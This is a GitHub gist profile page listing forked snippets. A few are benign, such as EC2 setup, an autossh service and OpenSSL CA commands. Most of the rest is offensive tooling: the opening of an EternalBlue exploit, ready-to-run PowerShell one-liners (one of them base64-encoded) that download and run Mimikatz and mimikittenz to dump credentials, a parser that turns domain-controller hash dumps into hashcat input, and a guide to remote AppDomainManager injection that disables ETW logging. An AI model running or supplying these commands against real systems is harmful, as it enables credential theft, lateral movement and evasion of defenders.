Skip to content

Instantly share code, notes, and snippets.

View sopsmattw's full-sized avatar

Matt Wagenknecht sopsmattw

10 followers · 21 following
View GitHub Profile
@sopsmattw
sopsmattw / ec2_instance_create_and_setup.sh
Created July 19, 2016 00:57 — forked from Pablosan/ec2_instance_create_and_setup.sh
A bash script that will set up a new EC2 instance and ssh into it.
#!/bin/bash
# Authorize TCP, SSH & ICMP for default Security Group
#ec2-authorize default -P icmp -t -1:-1 -s 0.0.0.0/0
#ec2-authorize default -P tcp -p 22 -s 0.0.0.0/0
# The Static IP Address for this instance:
IP_ADDRESS=$(cat ~/.ec2/ip_address)
# Create new t1.micro instance using ami-cef405a7 (64 bit Ubuntu Server 10.10 Maverick Meerkat)
@sopsmattw
sopsmattw / autossh.service
Created September 1, 2016 18:22 — forked from thomasfr/autossh.service
Systemd service for autossh
[Unit]
Description=Keeps a tunnel to 'remote.example.com' open
After=network.target
[Service]
User=autossh
# -p [PORT]
# -l [user]
# -M 0 --> no monitoring
# -N Just open the connection and do nothing (not interactive)
@sopsmattw
sopsmattw / makeauthority.sh
Created April 5, 2017 21:36 — forked from richieforeman/makeauthority.sh
Issue Your Own Self-Signed S/MIME Certs with OpenSSL
# Run this once
openssl genrsa -des3 -out ca.key 4096
openssl req -new -x509 -days 365 -key ca.key -out ca.crt
@sopsmattw
sopsmattw / eternalblue8_exploit.py
Created May 17, 2017 22:06 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@sopsmattw
sopsmattw / gist:9632c319b073dea7f630d2bcddbb36a7
Created December 7, 2017 21:06
### Keybase proof
I hereby claim:
* I am sopsmattw on github.
* I am qtip (https://keybase.io/qtip) on keybase.
* I have a public key ASDNisZzl-HDxeXvGP3cucUI2mTeU2a1VVJUGvhgdj6bFwo
To claim this, I am signing this object:
@sopsmattw
sopsmattw / Quick-Mimikatz
Created March 6, 2018 20:39 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master
@sopsmattw
sopsmattw / Quick-Mimikatz
Created March 6, 2018 20:39 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master
@sopsmattw
sopsmattw / resolve_domain_computers.py
Created January 24, 2019 05:40 — forked from 3xocyte/resolve_domain_computers.py
get /etc/hosts entries for computers in Active Directory
#!/usr/bin/env python
# resolve domain computers by @3xocyte
import argparse
import sys
import string
# requires dnspython and ldap3
import dns.resolver
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE
@sopsmattw
sopsmattw / lsadump2hashcat.txt
Last active May 15, 2020 21:20
mimikatz parser to hashcat
for parsing invoke-mimikatz dump from a DC via lsadump::lsa /inject
cat mimikatz_dump.txt | pcregrep -M 'User\s+:\s+[^\s]+\n\n.*Primary\n.*NTLM\s+:\s+[^\s]+\n' | sed "s/'/\\\'/" | xargs -L 3 echo | grep -v '\(null\)' |sed -e 's/User : //g;s/* Primary NTLM ://g'|grep -v -e '\$ ' -e 'IUSR'| awk '{print $1 ":" $2}' |sort -u
@sopsmattw
sopsmattw / README.md
Created September 2, 2020 17:48 — forked from byt3bl33d3r/README.md
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server